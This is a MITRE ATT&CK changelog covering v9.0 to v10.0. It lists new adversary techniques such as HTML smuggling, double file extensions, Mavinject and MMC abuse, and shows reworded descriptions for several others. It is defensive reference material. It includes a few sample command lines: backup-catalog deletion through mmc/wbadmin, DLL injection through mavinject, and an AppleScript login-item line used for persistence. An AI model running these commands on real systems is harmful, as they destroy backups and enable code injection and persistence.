ATT&CK Changes Between v9.0 and v10.0

Key

Colors for description field
Added
Changed
Deleted

Additional formats

These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.

This JSON file contains the machine readble output used to create this page: changelog.json

Techniques

enterprise-attack

New Techniques

[T1619] Cloud Storage Object Discovery

Current version: 1.0

Description: Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure. Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .


[T1213.003] Data from Information Repositories: Code Repositories

Current version: 1.0

Description: Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)


[T1036.007] Masquerading: Double File Extension

Current version: 1.0

Description: Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension) Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.


[T1562.010] Impair Defenses: Downgrade Attack

Current version: 1.0

Description: Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)


[T1564.008] Hide Artifacts: Email Hiding Rules

Current version: 1.0

Description: Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule) Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)


[T1615] Group Policy Discovery

Current version: 1.0

Description: Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\SYSVOL\\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.


[T1027.006] Obfuscated Files or Information: HTML Smuggling

Current version: 1.0

Description: Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018) Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters. For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)


[T1505.004] Server Software Component: IIS Components

Current version: 1.0

Description: Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013) Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012) Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)


[T1547.015] Boot or Logon Autostart Execution: Login Items

Current version: 1.0

Description: Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled. Login items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications. Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)


[T1218.014] Signed Binary Proxy Execution: MMC

Current version: 1.0

Description: Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview) For example, mmc C:\Users\foo\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. Adversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal) Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\path\to\test.msc.(Citation: abusing_com_reg)


[T1218.013] Signed Binary Proxy Execution: Mavinject

Current version: 1.0

Description: Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject) Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)


[T1620] Reflective Code Loading

Current version: 1.0

Description: Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)


[T1564.009] Hide Artifacts: Resource Forking

Current version: 1.0

Description: Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes) Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)


[T1562.009] Impair Defenses: Safe Mode Boot

Current version: 1.0

Description: Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019) Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021) Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)


[T1614.001] System Location Discovery: System Language Discovery

Current version: 1.0

Description: Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check) There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018) On a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.

Major Version Changes

[T1557] Adversary-in-the-Middle

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may attempt to position themselves between two ot1Adversaries may attempt to position themselves between two o
>r more networked devices using a man-in-the-middle (MiTM) te>r more networked devices using an adversary-in-the-middle (A
>chnique to support follow-on behaviors such as [Network Snif>iTM) technique to support follow-on behaviors such as [Netwo
>fing](https://attack.mitre.org/techniques/T1040) or [Transmi>rk Sniffing](https://attack.mitre.org/techniques/T1040) or [
>tted Data Manipulation](https://attack.mitre.org/techniques/>Transmitted Data Manipulation](https://attack.mitre.org/tech
>T1565/002). By abusing features of common networking protoco>niques/T1565/002). By abusing features of common networking 
>ls that can determine the flow of network traffic (e.g. ARP,>protocols that can determine the flow of network traffic (e.
> DNS, LLMNR, etc.), adversaries may force a device to commun>g. ARP, DNS, LLMNR, etc.), adversaries may force a device to
>icate through an adversary controlled system so they can col> communicate through an adversary controlled system so they 
>lect information or perform additional actions.(Citation: Ra>can collect information or perform additional actions.(Citat
>pid7 MiTM Basics)  Adversaries may leverage the MiTM positio>ion: Rapid7 MiTM Basics)  Adversaries may leverage the AiTM 
>n to attempt to modify traffic, such as in [Transmitted Data>position to attempt to modify traffic, such as in [Transmitt
> Manipulation](https://attack.mitre.org/techniques/T1565/002>ed Data Manipulation](https://attack.mitre.org/techniques/T1
>). Adversaries can also stop traffic from flowing to the app>565/002). Adversaries can also stop traffic from flowing to 
>ropriate destination, causing denial of service.>the appropriate destination, causing denial of service.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-16 15:19:48.733000+00:002021-09-28 13:09:51.467000+00:00
nameMan-in-the-MiddleAdversary-in-the-Middle
descriptionAdversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_detectionMonitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.
x_mitre_version1.12.0

[T1185] Browser Session Hijacking

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries can take advantage of security vulnerabilities at1Adversaries may take advantage of security vulnerabilities a
>nd inherent functionality in browser software to change cont>nd inherent functionality in browser software to change cont
>ent, modify behavior, and intercept information as part of v>ent, modify user-behaviors, and intercept information as par
>arious man in the browser techniques. (Citation: Wikipedia M>t of various browser session hijacking techniques.(Citation:
>an in the Browser)  A specific example is when an adversary > Wikipedia Man in the Browser)  A specific example is when a
>injects software into a browser that allows an them to inher>n adversary injects software into a browser that allows them
>it cookies, HTTP sessions, and SSL client certificates of a > to inherit cookies, HTTP sessions, and SSL client certifica
>user and use the browser as a way to pivot into an authentic>tes of a user then use the browser as a way to pivot into an
>ated intranet. (Citation: Cobalt Strike Browser Pivot) (Cita> authenticated intranet.(Citation: Cobalt Strike Browser Piv
>tion: ICEBRG Chrome Extensions)  Browser pivoting requires t>ot)(Citation: ICEBRG Chrome Extensions) Executing browser-ba
>he SeDebugPrivilege and a high-integrity process to execute.>sed behaviors such as pivoting may require specific process 
> Browser traffic is pivoted from the adversary's browser thr>permissions, such as <code>SeDebugPrivilege</code> and/or hi
>ough the user's browser by setting up an HTTP proxy which wi>gh-integrity/administrator rights.  Another example involves
>ll redirect any HTTP and HTTPS traffic. This does not alter > pivoting browser traffic from the adversary's browser throu
>the user's traffic in any way. The proxy connection is sever>gh the user's browser by setting up a proxy which will redir
>ed as soon as the browser is closed. Whichever browser proce>ect web traffic. This does not alter the user's traffic in a
>ss the proxy is injected into, the adversary assumes the sec>ny way, and the proxy connection can be severed as soon as t
>urity context of that process. Browsers typically create a n>he browser is closed. The adversary assumes the security con
>ew process for each tab that is opened and permissions and c>text of whichever browser process the proxy is injected into
>ertificates are separated accordingly. With these permission>. Browsers typically create a new process for each tab that 
>s, an adversary could browse to any resource on an intranet >is opened and permissions and certificates are separated acc
>that is accessible through the browser and which the browser>ordingly. With these permissions, an adversary could potenti
> has sufficient permissions, such as Sharepoint or webmail. >ally browse to any resource on an intranet, such as [Sharepo
>Browser pivoting also eliminates the security provided by 2->int](https://attack.mitre.org/techniques/T1213/002) or webma
>factor authentication. (Citation: cobaltstrike manual)>il, that is accessible through the browser and which the bro
 >wser has sufficient permissions. Browser pivoting may also b
 >ypass security provided by 2-factor authentication.(Citation
 >: cobaltstrike manual)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:34:09.429000+00:002021-10-18 12:11:16.808000+00:00
nameMan in the BrowserBrowser Session Hijacking
descriptionAdversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser) A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser) A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights. Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)
x_mitre_detectionThis is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications.This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Modification
Minor Version Changes

[T1557.002] Adversary-in-the-Middle: ARP Cache Poisoning

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may poison Address Resolution Protocol (ARP) cact1Adversaries may poison Address Resolution Protocol (ARP) cac
>hes to position themselves between the communication of two >hes to position themselves between the communication of two 
>or more networked devices. This activity may be used to enab>or more networked devices. This activity may be used to enab
>le follow-on behaviors such as [Network Sniffing](https://at>le follow-on behaviors such as [Network Sniffing](https://at
>tack.mitre.org/techniques/T1040) or [Transmitted Data Manipu>tack.mitre.org/techniques/T1040) or [Transmitted Data Manipu
>lation](https://attack.mitre.org/techniques/T1565/002).  The>lation](https://attack.mitre.org/techniques/T1565/002).  The
> ARP protocol is used to resolve IPv4 addresses to link laye> ARP protocol is used to resolve IPv4 addresses to link laye
>r addresses, such as a media access control (MAC) address.(C>r addresses, such as a media access control (MAC) address.(C
>itation: RFC826 ARP) Devices in a local network segment comm>itation: RFC826 ARP) Devices in a local network segment comm
>unicate with each other by using link layer addresses. If a >unicate with each other by using link layer addresses. If a 
>networked device does not have the link layer address of a p>networked device does not have the link layer address of a p
>articular networked device, it may send out a broadcast ARP >articular networked device, it may send out a broadcast ARP 
>request to the local network to translate the IP address to >request to the local network to translate the IP address to 
>a MAC address. The device with the associated IP address dir>a MAC address. The device with the associated IP address dir
>ectly replies with its MAC address. The networked device tha>ectly replies with its MAC address. The networked device tha
>t made the ARP request will then use as well as store that i>t made the ARP request will then use as well as store that i
>nformation in its ARP cache.  An adversary may passively wai>nformation in its ARP cache.  An adversary may passively wai
>t for an ARP request to poison the ARP cache of the requesti>t for an ARP request to poison the ARP cache of the requesti
>ng device. The adversary may reply with their MAC address, t>ng device. The adversary may reply with their MAC address, t
>hus deceiving the victim by making them believe that they ar>hus deceiving the victim by making them believe that they ar
>e communicating with the intended networked device. For the >e communicating with the intended networked device. For the 
>adversary to poison the ARP cache, their reply must be faste>adversary to poison the ARP cache, their reply must be faste
>r than the one made by the legitimate IP address owner. Adve>r than the one made by the legitimate IP address owner. Adve
>rsaries may also send a gratuitous ARP reply that maliciousl>rsaries may also send a gratuitous ARP reply that maliciousl
>y announces the ownership of a particular IP address to all >y announces the ownership of a particular IP address to all 
>the devices in the local network segment.  The ARP protocol >the devices in the local network segment.  The ARP protocol 
>is stateless and does not require authentication. Therefore,>is stateless and does not require authentication. Therefore,
> devices may wrongly add or update the MAC address of the IP> devices may wrongly add or update the MAC address of the IP
> address in their ARP cache.(Citation: Sans ARP Spoofing Aug> address in their ARP cache.(Citation: Sans ARP Spoofing Aug
> 2003)(Citation: Cylance Cleaver)  Adversaries may use ARP c> 2003)(Citation: Cylance Cleaver)  Adversaries may use ARP c
>ache poisoning as a means to man-in-the-middle (MiTM) networ>ache poisoning as a means to intercept network traffic. This
>k traffic. This activity may be used to collect and/or relay> activity may be used to collect and/or relay data such as c
> data such as credentials, especially those sent over an ins>redentials, especially those sent over an insecure, unencryp
>ecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug>ted protocol.(Citation: Sans ARP Spoofing Aug 2003) 
> 2003)  

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 16:41:35.256000+00:002021-07-28 01:04:39.141000+00:00
descriptionAdversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache. An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment. The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver) Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003) Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not 